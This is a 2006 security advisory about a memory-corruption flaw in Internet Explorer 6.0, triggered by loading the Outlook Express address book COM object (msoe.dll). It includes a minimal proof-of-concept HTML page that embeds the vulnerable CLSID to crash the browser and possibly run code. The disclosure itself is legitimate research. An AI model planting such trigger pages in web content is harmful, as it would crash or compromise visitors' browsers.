Advisory ID:
XSec-06-04
Advisory Name:
Internet Explorer (msoe.dll) COM Object Instantiation Vulnerability
Release Date:
08/15/2006
Tested on:
Internet Explorer 6.0 SP1 on Microsoft Windows 2000 SP4 / XP SP2 CN
Affected version:
Internet Explorer 6.0
Author:
nop <nop#xsec.org>
http://www.xsec.org
Overview:
A vulnerability has been found in Internet Explorer 6.0. When Internet Explorer tries to instantiate the msoe.dll (OutLook) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code.
Exploit:
=============== msoe.dll.htm start ================
<!--
// Internet Explorer (msoe.dll) COM Object Instantiation Vulnerability
// tested: 2000SP4/XPSP2 CN
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {233A9694-667E-11d1-9DFB-006097D50408}
// Info: Outlook Express Address Book
// ProgID: OutlookExpress.AddressBook.1
// InprocServer32: %ProgramFiles%Outlook Expressmsoe.dll
--!>
<html><body>
<object classid="CLSID:{233A9694-667E-11d1-9DFB-006097D50408}" ></object>
</body></html>
=============== msoe.dll.htm end ==================
Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=10
About XSec:
We are redhat.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum